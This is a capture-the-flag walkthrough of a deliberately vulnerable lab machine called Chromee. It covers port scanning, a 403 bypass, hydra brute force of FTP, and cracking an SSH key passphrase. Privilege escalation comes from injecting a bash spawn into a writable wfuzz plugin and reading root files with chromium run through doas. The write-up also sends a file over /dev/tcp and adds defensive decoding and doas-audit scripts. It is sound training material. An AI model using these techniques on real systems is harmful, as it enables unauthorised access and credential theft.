Another new box I could not finish on my own...

Port scan

The first trap is right here: you need a full port scan to find the FTP port. Connecting to it directly with nc shows which service it is.
```
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.80.38
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-29 15:27 CST
Nmap scan report for bogon (192.168.80.38)
Host is up (0.0088s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8080/tcp  open  http-proxy
23333/tcp open  elxmgmt
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds

┌──(root㉿kakeru)-[~/tmp]
└─# nc 192.168.80.38 23333
220 (vsFTPd 3.0.3)
```
Anonymous FTP login is not allowed; the server asks for a password, so let's look for information on the web side.

Web enumeration

There are two web ports, 80 and 8080.
```
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.38 -x php,txt,jpg,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.80.38
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,jpg,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php             (Status: 200) [Size: 3]
/secret.php           (Status: 200) [Size: 549]

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.38/secret.php
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);
echo "<h1>{$greeting},adriana</h1>";
echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
echo "<p>你的IP:{$visitorIP}</p>";
if (isset($_GET['aaa'])) {
    $file_content = file_get_contents('/opt/note/dic.txt');
    echo $file_content;
} else {
    die();
}
?>
</body>
</html>
```
On port 80 the interesting file is secret.php. Requesting it directly returns the raw PHP source instead of executing it, but the logic is readable: if an aaa parameter is present, the page outputs a wordlist (/opt/note/dic.txt).
```
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.80.38:8080 -x php,txt,jpg,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.80.38:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,jpg,js,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 326] [--> http://192.168.80.38:8080/javascript/]
/silence              (Status: 403) [Size: 280]
```
Port 8080 has a /silence directory that returns 403. Requesting the root of port 8080 gives a hint that a bypass is needed. bypass403 is a tool that tries a set of common 403 bypass techniques.
```
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.38:8080
<h2>You may need to bypass!</h2>
```

```
[+] HTTP Method Bypass
----------------------
GET  : Status: 403, Length : 280
POST : Status: 200, Length : 616
╭──────────────────────────────────────────────────────────────────────────────────╮
╰─> PAYLOAD : curl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POST
```
A POST request gets through, so I used the payload the tool printed.
```
┌──(root㉿kakeru)-[~/tmp]
└─# curl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POST
<!DOCTYPE html>
<html>
<head>
    <title>Silence</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; margin: 0; padding: 0; }
        .container { display: flex; justify-content: center; align-items: center; height: 100vh; }
        h1 { font-size: 30px; }
        p { font-size: 18px; color: #888; }
    </style>
</head>
<body>
    <div class="container">
        <div>
            <h1>Silence</h1>
            <p>We are working to improve our website.</p>
            <p>contact: support@chromee.hmv</p>
        </div>
    </div>
</body>
</html>
```
This reveals the domain chromee.hmv. After pointing that hostname at the target and requesting secret.php through it, the PHP is actually executed.
```
┌──(root㉿kakeru)-[~/tmp]
└─# curl chromee.hmv/secret.php?aaa=1
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
<h1>早上好,adriana</h1><p>当前时间:2025-03-29 08:42:54</p><p>你的IP:192.168.80.11</p>The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
</body>
</html>
```
This gives us a piece of text, and the page also gives a username: adriana.

Feed the text to cupp to generate a wordlist (whenever a box hands you a text to build a wordlist from, cupp is the tool), then brute-force FTP with hydra using that wordlist.
```
┌──(root㉿kakeru)-[~/tmp]
└─# cupp -w tmp.txt
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
  print("     \                # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
  print("      \     \033[1;31m,__,\033[1;m             # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
  print("       \   \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m         # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
  print("          \033[1;31m(__)    )\ \033[1;m  ")
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]

*************************************************
*                    WARNING!!!                 *
*          Using large wordlists in some        *
*         options bellow is NOT recommended!    *
*************************************************

> Do you want to concatenate all words from wordlist? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to tmp.txt.cupp.txt, counting 663 words.
[+] Now load your pistolero with tmp.txt.cupp.txt and shoot! Good luck!

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l adriana -P tmp.txt.cupp.txt ftp://192.168.80.38:23333
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-29 15:44:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 663 login tries (l:1/p:663), ~42 tries per task
[DATA] attacking ftp://192.168.80.38:23333/
[23333][ftp] host: 192.168.80.38   login: adriana   password: Lily2020
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-29 15:44:58
```
After logging in to FTP there is another trap: a hidden entry named ... (three dots), which holds an SSH private key. Listing /home shows which users exist.
```
lftp adriana@192.168.80.38:~> ls /home
drwxr-x---    4 1000     1000         4096 Mar 09 07:59 follower
drwxr-x---    3 1001     1001         4096 Mar 07 12:39 softly
```
Then crack the key passphrase with john.
```
┌──(root㉿kakeru)-[~/tmp]
└─# ssh2john id_rsa > hash

┌──(root㉿kakeru)-[~/tmp]
└─# john hash --wordlist /usr/share/wordlists/rockyou.txt
```
The id_rsa passphrase is cassandra. Log in over SSH.
```
┌──(root㉿kakeru)-[~/tmp]
└─# ssh follower@192.168.80.38 -p 22 -i id_rsa
Enter passphrase for key 'id_rsa':
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
follower@Chromee:~$ id
uid=1000(follower) gid=1000(follower) groups=1000(follower)
```
Privilege escalation

follower has no sudo. Nothing in follower's files stands out, so upload pspy64 and watch for scheduled tasks.
```
2025/03/29 09:11:38 CMD: UID=0     PID=1      | /sbin/init
2025/03/29 09:12:01 CMD: UID=0     PID=1621   | /usr/sbin/CRON -f
2025/03/29 09:12:01 CMD: UID=0     PID=1622   | /usr/sbin/CRON -f
2025/03/29 09:12:01 CMD: UID=0     PID=1623   | /bin/sh -c /root/script.sh
2025/03/29 09:12:01 CMD: UID=0     PID=1624   | /bin/bash /root/script.sh
^CExiting program... (interrupt)
```
Root runs /root/script.sh from cron. Next, let's see what is in the home directory.
```
follower@Chromee:~$ ls
cat.gif  linpeas.sh  note.txt  pspy64
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets. 47 is not just a number, it's a twist of fate.
```
There is a GIF, and the hint mentions 47, which points to ROT47. Pull the GIF back to the attacker machine to inspect it.
```
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > cat.gif

follower@Chromee:~$ cat cat.gif > /dev/tcp/192.168.80.11/1234

┌──(root㉿kakeru)-[~/tmp]
└─# exiftool cat.gif
ExifTool Version Number         : 13.00
File Name                       : cat.gif
Directory                       : .
File Size                       : 3.5 MB
File Modification Date/Time     : 2025:03:29 16:17:46+08:00
File Access Date/Time           : 2025:03:29 16:17:34+08:00
File Inode Change Date/Time     : 2025:03:29 16:17:46+08:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 640
Image Height                    : 640
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : Imagemagick Convert Timeline
Profile CMM Type                :
Profile Version                 : 4.3.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2016:01:01 00:00:00
Profile File Signature          : acsp
Primary Platform                : Unknown ()
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             :
Device Model                    :
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 :
Profile ID                      : 0
Profile Description             : sRGB
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Media White Point               : 0.9642 1 0.82491
Red Tone Reproduction Curve     : (Binary data 40 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 40 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 40 bytes, use -b option to extract)
Profile Copyright               : Google Inc. 2016
Frame Count                     : 13
Duration                        : 6.31 s
Image Size                      : 640x640
Megapixels                      : 0.410
```
The comment "Imagemagick Convert Timeline" is a hint about the timeline, i.e. the frame timing. Searching for GIF steganography leads to ImageMagick's identify tool, which prints the per-frame delays as a series of numbers.
```
┌──(root㉿kakeru)-[~/tmp]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6
```
The leading numbers are ASCII codes of letters, so keep only the values that are printable characters, convert them from decimal to characters in CyberChef first, then apply ROT47. That yields the password p3p573r.
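The frame-delay decoding above, as an added example that is not part of the original write-up: gif_frame_delays() walks the GIF block structure to collect the same delays identify's %T prints, decode_delays() keeps the printable codes and applies ROT47, and build_test_gif() produces a constructed GIF carrying the delays observed on the box (the real cat.gif is not included).

```python
"""Decode the message hidden in cat.gif's frame delays, as described above.
Added example (not from the write-up): it reproduces `identify -format "%T "`
plus CyberChef in code. gif_frame_delays() walks the real GIF block structure;
build_test_gif() makes a constructed GIF with the delays observed on the box."""
import struct


def gif_frame_delays(data: bytes) -> list:
    """Return each Graphic Control Extension delay (1/100 s) in frame order."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed, pos = data[10], 13
    if packed & 0x80:                       # global colour table present
        pos += 3 * (2 << (packed & 0x07))

    def skip_subblocks(p: int) -> int:      # length-prefixed blocks, 0x00 ends
        while data[p] != 0:
            p += data[p] + 1
        return p + 1

    delays = []
    while pos < len(data) and data[pos] != 0x3B:        # 0x3B = trailer
        if data[pos] == 0x21:               # extension block
            if data[pos + 1] == 0xF9:       # graphic control extension
                delays.append(struct.unpack_from("<H", data, pos + 4)[0])
            pos = skip_subblocks(pos + 2)
        elif data[pos] == 0x2C:             # image descriptor
            lpacked = data[pos + 9]
            pos += 10
            if lpacked & 0x80:              # local colour table
                pos += 3 * (2 << (lpacked & 0x07))
            pos = skip_subblocks(pos + 1)   # +1 skips LZW minimum code size
        else:
            raise ValueError(f"unknown block 0x{data[pos]:02x} at {pos}")
    return delays


def rot47(text: str) -> str:
    """ROT47 over printable ASCII 33..126; applying it twice is the identity."""
    return "".join(chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
                   for c in text)


def decode_delays(delays: list) -> str:
    """Keep delays that are printable ASCII codes (drops the 6s), then ROT47."""
    return rot47("".join(chr(d) for d in delays if 33 <= d <= 126))


def build_test_gif(delays: list) -> bytes:
    """Constructed 1x1 GIF, one frame per delay, no colour tables."""
    out = bytearray(b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0))
    for d in delays:
        out += b"\x21\xF9\x04\x00" + struct.pack("<H", d) + b"\x00\x00"
        out += b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
        out += b"\x02\x01\x44\x00"          # LZW min code size 2, one data byte
    return bytes(out + b"\x3B")


OBSERVED = [65, 98, 65, 100, 102, 98, 67, 6, 6, 6, 6, 6, 6]   # identify's %T output
```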
This is not another user's password; it is follower's own. It is easy to get stuck here too: you have a password but no sudo, so it is not obvious what it is for.

Look for files owned by root.
```
follower@Chromee:/home$ find / -user root -print 2>/dev/null | grep -Pi -v "sys|sys|proc|run|usr|boot|dev|etc|var"
/
/mnt
/bin
/root
/home
/home/follower/cat.gif
/lib32
/sbin
/vmlinuz.old
/lost+found
/libx32
/lib
/initrd.img.old
/vmlinuz
/tmp
/tmp/.Test-unix
/tmp/.XIM-unix
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.X11-unix
/srv
/srv/zeus.conf
/srv/ftp
/initrd.img
/opt
/opt/note/...
/opt/note/dic.txt
/opt/...
/media
/media/cdrom
/media/cdrom0
/lib64
```
This reveals a configuration file under /srv, zeus.conf.
```
follower@Chromee:/srv$ cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
```
I had not seen this format before; asking GPT, it turns out these are doas rules. follower may run /usr/local/bin/wfuzz as softly, so the first goal is to become softly. Let's look at what wfuzz contains.
```
follower@Chromee:/srv$ cat /usr/local/bin/wfuzz
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from wfuzz.wfuzz import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
```
It imports the wfuzz.wfuzz module.
```
follower@Chromee:/srv$ find / -name 'wfuzz' -print 2>/dev/null
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:/srv$ cd /usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ ls
__init__.py  __pycache__   api.py   dictionaries.py  externals   factories    fuzzobjects.py  fuzzrequest.py  mixins.py  myqueues.py  plugin_api  ui
__main__.py  advanced.rst  core.py  exception.py     facade.py   filters      fuzzqueues.py   helpers         myhttp.py  options.py   plugins     wfuzz.py
```
With the package located, try to hijack the library: first find a file in it that is writable, then write a bash spawn into it.
```
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writable -print 2>/dev/null
./plugins/payloads/file.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ echo "import os;os.system('/bin/bash')" > ./plugins/payloads/file.py
```
Running wfuzz as softly through doas then drops a shell as softly.
```
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ doas -u softly /usr/local/bin/wfuzz -w /home/note.txt -u 127.0.0.1
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
```
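As an added example (not from the write-up or from doas itself), a small audit that flags the two weak points in zeus.conf the chain above relies on: a nopass rule that reaches root, and a command that is a Python script whose import tree contains group- or world-writable files such as ./plugins/payloads/file.py. The wfuzz-like directory it checks is constructed by make_test_tree(); the mapping from command to import tree is supplied by the caller.

```python
"""Audit doas rules such as /srv/zeus.conf for the two weak points this write-up
chains: a nopass rule that reaches root, and a command that is a Python script with
a caller-writable import tree. Added example, not from the write-up or from doas."""
import os
import re
import tempfile
from collections import namedtuple
# doas.conf: permit|deny [nopass|nolog|persist|keepenv ...] identity [as target] [cmd path [args]]
RULE_RE = re.compile(
    r"^(?P<action>permit|deny)\s+(?P<opts>(?:(?:nopass|nolog|persist|keepenv)\s+)*)"
    r"(?P<identity>\S+)(?:\s+as\s+(?P<target>\S+))?(?:\s+cmd\s+(?P<cmd>\S+))?")
Rule = namedtuple("Rule", "action nopass identity target cmd")

def parse_doas(text: str) -> list:
    """Parse doas.conf text into Rule tuples (setenv options are not handled)."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError(f"unparsable rule: {line!r}")
        rules.append(Rule(m["action"], "nopass" in m["opts"], m["identity"],
                          m["target"] or "root", m["cmd"]))   # doas defaults target to root
    return rules

def writable_by_others(root: str) -> list:
    """Group- or world-writable files under root (code-injection points when root
    is the import tree of a script doas runs as another user)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):   # yields nothing if root is not a dir
        for name in files:
            path = os.path.join(dirpath, name)
            if os.lstat(path).st_mode & 0o022:
                hits.append(path)
    return sorted(hits)

def risky_rules(rules: list, import_trees: dict) -> list:
    """import_trees maps a cmd path to its package dir (here wfuzz -> dist-packages/wfuzz)."""
    findings = []
    for r in rules:
        if r.action != "permit":
            continue
        if r.nopass and r.target == "root":
            findings.append(f"{r.identity} runs {r.cmd or 'ANY command'} as root with no password")
        for f in writable_by_others(import_trees.get(r.cmd or "", os.devnull)):
            findings.append(f"{r.cmd} (run as {r.target}) imports writable {f}")
    return findings

def make_test_tree() -> str:
    """Constructed wfuzz look-alike: plugins/payloads/file.py left mode 0666 as on the box."""
    root = os.path.join(tempfile.mkdtemp(), "wfuzz")
    os.makedirs(os.path.join(root, "plugins", "payloads"))
    for rel, mode in (("__init__.py", 0o644), ("plugins/payloads/file.py", 0o666)):
        path = os.path.join(root, rel)
        open(path, "w").close()
        os.chmod(path, mode)
    return root
```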
softly

The next step is escalating through /usr/bin/chromium, which is the Chromium browser. It takes a few dangerous flags: disable the sandbox, disable GPU rendering, and run headless. I found the flags by starting with none, getting the error that running as root requires disabling the sandbox, and then feeding each error message to an AI and adjusting step by step. The core goal is reading files as root.
```
softly@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ doas -u root /usr/bin/chromium --no-sandbox --headless --disable-gpu -dump-dom file:///etc/passwd
[0329/095206.275413:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
follower:x:1000:1000::/home/follower:/bin/bash
softly:x:1001:1001::/home/softly:/bin/bash
ftp:x:106:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
</pre></body></html>
```
That gives arbitrary file read as root, which solves the box. Clearly I would not have gotten this on my own: drop or misspell any one of these flags and it fails. The final --dump-dom is what prints the page content.

There is also the intended route: open a remote debugging port.
```
softly@Chromee:/home/follower$ doas -u root /usr/bin/chromium --no-sandbox --headless --remote-debugging-port=9222 http://127.0.0.1 &
[2] 18087
ss -lntup
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      10         127.0.0.1:8000       0.0.0.0:*
tcp   LISTEN 0      10         127.0.0.1:9222       0.0.0.0:*
tcp   LISTEN 0      511          0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      32                 *:23333            *:*
tcp   LISTEN 0      511             [::]:80            [::]:*
tcp   LISTEN 0      511                *:8080             *:*
tcp   LISTEN 0      128             [::]:22            [::]:*
```
Now upload socat and forward the port.
```
softly@Chromee:~$ ./socat TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222 &
[3] 18212
```
Since this is a debugging session, open chrome://inspect in a local browser, add the forwarded address as a target and click inspect. We know there is a cron job, so just wait on the debugging page; after a while a request appears, a POST request, and it carries root's password.
Summary

Learned what a 403 bypass is and how to use it
When a box hands you a text file as a hint, use cupp
Hidden files named ...
Besides sudo, doas can also grant execution rights as another user
A recovered password may be your own user's, not only another user's
When reading a Python program, check whether one of its packages is writable and can be used for privilege escalation
Port forwarding with socat
Learned the chromium command, some of its flags, and the Chromium remote debugging window